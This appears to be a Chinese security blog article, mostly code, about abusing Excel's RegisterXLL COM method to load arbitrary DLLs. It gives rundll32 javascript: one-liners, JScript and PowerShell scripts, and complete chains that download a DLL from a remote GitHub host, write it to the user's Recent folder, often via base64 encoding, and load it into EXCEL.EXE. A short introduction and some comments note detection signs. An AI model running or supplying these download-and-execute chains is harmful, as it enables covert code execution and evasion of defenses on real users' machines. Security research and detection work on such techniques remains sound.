本文讲的是利用 Excel.Application 对象的 RegisterXLL() 方法加载 DLL。
Ryan Hanson（@ryHanson）最近分享了一个技巧：利用 Excel.Application 对象的 RegisterXLL() 方法能够加载任意 DLL。我对其分享的 POC 作了测试，接着做了扩展，添加了远程下载并执行的功能，并分析该方法相关的利用技巧，详细介绍脚本开发中的细节。需要注意的前提：目标机器必须安装有 Excel；从 POC 的行为看，RegisterXLL 会把指定 DLL 加载进 EXCEL.EXE 进程，DLL 中的代码以当前用户权限执行。从防御角度看，由 wscript/cscript、rundll32 或 powershell 通过 COM 拉起 EXCEL.EXE、随后从用户可写目录（如 Recent 文件夹）加载未签名 DLL，是这一技巧最直接的检测特征。
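:: Loads a DLL through Excel's COM automation interface without excel.exe ever appearing on a command line.
:: rundll32 runs a javascript: URL via mshtml's RunHTMLApplication; the script creates Excel.Application,
:: calls RegisterXLL on the DLL path and then closes the HTA host. Spaces must be %20-encoded and the DLL
:: path is a JS string literal, so its backslashes are doubled (the original page had lost the separators).
:: NOTE(review): the observable chain here is rundll32.exe -> (COM) EXCEL.EXE -> DLL load from C:\test.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\test\\messagebox.dll');this.close();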
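// JScript (WSH) variant of the POC: instantiate Excel over COM and hand RegisterXLL the DLL path.
// The path is a JS string literal, so each backslash is escaped (the page had lost the separators).
var excel = new ActiveXObject("Excel.Application");
excel.RegisterXLL("C:\\test\\messagebox.dll");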
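# PowerShell variant of the POC: resolve Excel.Application from its ProgID, instantiate it
# and call RegisterXLL on the DLL path (path separators restored; the page had lost them).
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))
$excel.RegisterXLL("C:\test\messagebox.dll")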
// Smoke test for the script host: prints "1" to confirm the script runs under wscript/cscript.
var marker = "1";
WScript.Echo(marker);
// Prints the current user's TEMP directory, read from the per-user ("USER") environment block
// exposed by WScript.Shell.
var shell = WScript.CreateObject("WScript.Shell");
var userEnv = shell.Environment("USER");
WScript.Echo(userEnv("TEMP"));
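// Prints the user's Recent folder (a per-user, user-writable directory) via WScript.Shell.SpecialFolders.
// Fix: the original line was missing the closing parenthesis of WScript.Echo(...).
var shell = WScript.CreateObject("WScript.Shell");
WScript.Echo(shell.SpecialFolders("Recent"));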
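// Builds and prints the drop path for the DLL inside the user's Recent folder.
// SpecialFolders("Recent") has no trailing separator, so one is inserted before the file name
// (the page had lost it, which would have produced "...Recentmsg.dll").
var shell = WScript.CreateObject("WScript.Shell");
WScript.Echo(shell.SpecialFolders("Recent") + "\\msg.dll");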
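// Checks whether Office appears to be installed before attempting the Excel COM object.
// Only "C:\Program Files\Microsoft Office" is probed; an Office under "Program Files (x86)" or a
// Click-to-Run install elsewhere would be reported as missing -- TODO confirm whether that matters.
var FileSys = WScript.CreateObject("Scripting.FileSystemObject");
if (FileSys.FolderExists("c:\\Program Files\\Microsoft Office")) {
    WScript.Echo("[+] Find Microsoft Office.");
} else {
    WScript.Echo("[!] I can't find Microsoft Office!");
}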
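// Downloads calc.dll with a synchronous Msxml2.XMLHTTP GET and writes the raw response bytes through
// ADODB.Stream in binary mode (Type = 1) into the user's Recent folder. SaveToFile(..., 2) overwrites
// any existing file. Path separator before the file name restored.
var sGet = new ActiveXObject("ADODB.Stream");
var xGet = new ActiveXObject("Msxml2.XMLHTTP");
xGet.Open("GET", "https://raw.githubusercontent.com/3gstudent/test/master/calc.dll", 0);
xGet.Send();
sGet.Type = 1;
sGet.Open();
sGet.Write(xGet.ResponseBody);
var dropPath = WScript.CreateObject("WScript.Shell").SpecialFolders("Recent") + "\\calc.dll";
sGet.SaveToFile(dropPath, 2);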
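// Same download-and-drop as the Msxml2 version, using WinHttp.WinHttpRequest.5.1 for the GET.
// ADODB.Stream in binary mode keeps the DLL bytes intact; path separator before the file name restored.
h = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
h.Open("GET", "https://raw.githubusercontent.com/3gstudent/test/master/calc.dll", false);
h.Send();
s = new ActiveXObject("ADODB.Stream");
s.Type = 1;   // binary
s.Open();
s.Write(h.ResponseBody);
x = new ActiveXObject("WScript.Shell").SpecialFolders("Recent") + "\\calc.dll";
s.SaveToFile(x, 2);   // 2 = overwrite if present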
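// Full chain in one WSH script: probe for Office, download calc.dll into the Recent folder,
// then load it through Excel.Application.RegisterXLL. Path separators restored.
// NOTE(review): the detection-relevant sequence is wscript/cscript -> (COM) EXCEL.EXE loading a freshly
// written, unsigned DLL from the user's Recent folder; an HTTP error body would be written and passed
// to RegisterXLL unchecked, since no status check is performed.
var FileSys = WScript.CreateObject("Scripting.FileSystemObject");
if (FileSys.FolderExists("c:\\Program Files\\Microsoft Office")) {
    WScript.Echo("[+] Find Microsoft Office.");
    WScript.Echo("[+] Download file...");
    h = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
    h.Open("GET", "https://raw.githubusercontent.com/3gstudent/test/master/calc.dll", false);
    h.Send();
    s = new ActiveXObject("ADODB.Stream");
    s.Type = 1;
    s.Open();
    s.Write(h.ResponseBody);
    x = new ActiveXObject("WScript.Shell").SpecialFolders("Recent") + "\\calc.dll";
    s.SaveToFile(x, 2);
    WScript.Echo("[+] Download Success.");
    WScript.Echo("[+] Load dll...");
    e = new ActiveXObject("Excel.Application");
    e.RegisterXLL(x);
    WScript.Echo("[+] Load dll Success.");
} else {
    WScript.Echo("[!] I can't find Microsoft Office!");
}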
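# PowerShell version of the full chain: download calc.dll into the user's Recent folder,
# then load it through Excel.Application.RegisterXLL. Statements split and path separators restored.
$path = $env:APPDATA + "\Microsoft\Windows\Recent\calc.dll"
$client = New-Object System.Net.WebClient
$client.DownloadFile('https://raw.githubusercontent.com/3gstudent/test/master/calc.dll', $path)
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))
$excel.RegisterXLL($path)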
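:: rundll32 one-liner for the download step only: WinHttp GET, then ADODB.Stream binary save into the
:: Recent folder (no RegisterXLL here). Spaces are %20-encoded; the "\..\mshtml" host path and the
:: JS string separator before calc.dll are restored (the page had lost them).
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","https://raw.githubusercontent.com/3gstudent/test/master/calc.dll",false);h.Send();s=new%20ActiveXObject("ADODB.Stream");s.Type=1;s.Open();s.Write(h.ResponseBody);x=new%20ActiveXObject("WScript.Shell").SpecialFolders("Recent")+"\\calc.dll";s.SaveToFile(x,2);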
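:: rundll32 one-liner that fetches a text file (version.txt) and writes ResponseText to C:\test\1.txt
:: with Scripting.FileSystemObject. This is fine for text content; see the next variant for why it
:: does not work for a binary. Path separators restored.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","https://raw.githubusercontent.com/3gstudent/test/master/version.txt",false);h.Send();s=new%20ActiveXObject("Scripting.FileSystemObject");f=s.CreateTextFile("c:\\test\\1.txt",true);f.WriteLine(h.ResponseText);f.Close();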
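:: Same FileSystemObject approach applied to calc.dll. Kept as the negative example: ResponseText decodes
:: the body as text and WriteLine appends a line break, so the bytes written are not the original DLL --
:: presumably why the article switches to a base64-encoded payload below. Path separators restored.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","https://raw.githubusercontent.com/3gstudent/test/master/calc.dll",false);h.Send();s=new%20ActiveXObject("Scripting.FileSystemObject");f=s.CreateTextFile("c:\\test\\1.txt",true);f.WriteLine(h.ResponseText);f.Close();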
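# Attacker-side helper: base64-encode calc.dll into buffer.txt so it can be fetched and written as text.
# Fix: the original collapsed line piped the encoded string into Set-Content *inside* the assignment,
# leaving $fileContentEncoded empty; the assignment and the write are now separate statements.
$fileContent = [System.IO.File]::ReadAllBytes('calc.dll')
$fileContentEncoded = [System.Convert]::ToBase64String($fileContent)
$fileContentEncoded | Set-Content "buffer.txt"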
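// Downloads the base64 text form of the DLL and writes it to C:\test\1.txt as plain text.
// Text round-tripping is safe here because the payload is already ASCII. Path separators restored.
h = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
h.Open("GET", "https://raw.githubusercontent.com/3gstudent/test/master/calcbase64.txt", false);
h.Send();
fso1 = new ActiveXObject("Scripting.FileSystemObject");
f = fso1.CreateTextFile("c:\\test\\1.txt", true);
f.WriteLine(h.ResponseText);
f.Close();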
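:: rundll32 form of the base64 download: fetches calcbase64.txt and writes it as text to C:\test\1.txt.
:: Path separators restored; the decode step happens in a separate snippet.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","https://raw.githubusercontent.com/3gstudent/test/master/calcbase64.txt",false);h.Send();s=new%20ActiveXObject("Scripting.FileSystemObject");f=s.CreateTextFile("c:\\test\\1.txt",true);f.WriteLine(h.ResponseText);f.Close();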
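// Download the base64 text, decode it in-script with the COM-visible .NET classes
// (System.Text.ASCIIEncoding + System.Security.Cryptography.FromBase64Transform), write the decoded
// bytes with ADODB.Stream in binary mode, and load the result through Excel.RegisterXLL.
// GetByteCount_2 / GetBytes_4 are the COM-mangled names of the string overloads of
// Encoding.GetByteCount / Encoding.GetBytes. Path separators restored.
x = "c:\\test\\calc.dll";
h = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
h.Open("GET", "https://raw.githubusercontent.com/3gstudent/test/master/calcbase64.txt", false);
h.Send();
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
var length = enc.GetByteCount_2(h.ResponseText);
var ba = enc.GetBytes_4(h.ResponseText);
var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
ba = transform.TransformFinalBlock(ba, 0, length);
s = new ActiveXObject("ADODB.Stream");
s.Type = 1;
s.Open();
s.Write(ba);
s.SaveToFile(x, 2);
new ActiveXObject("Excel.Application").RegisterXLL(x);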
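# PowerShell decode step: read the base64 text, decode it to bytes, write the DLL and load it via
# Excel.RegisterXLL. Statements split and path separators restored.
# NOTE(review): Get-Content returns one string per line; FromBase64String only accepts a single string,
# so this relies on 1.txt containing the payload on one line -- use -Raw if that is not guaranteed.
$FilePath = "C:\test\test1.dll"
$base64Buf = Get-Content c:\test\1.txt
$fileContentBytes = [System.Convert]::FromBase64String($base64Buf)
[System.IO.File]::WriteAllBytes($FilePath, $fileContentBytes)
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))
$excel.RegisterXLL($FilePath)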
原文发布时间为:2017年7月24日
本文作者:3gstudent
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。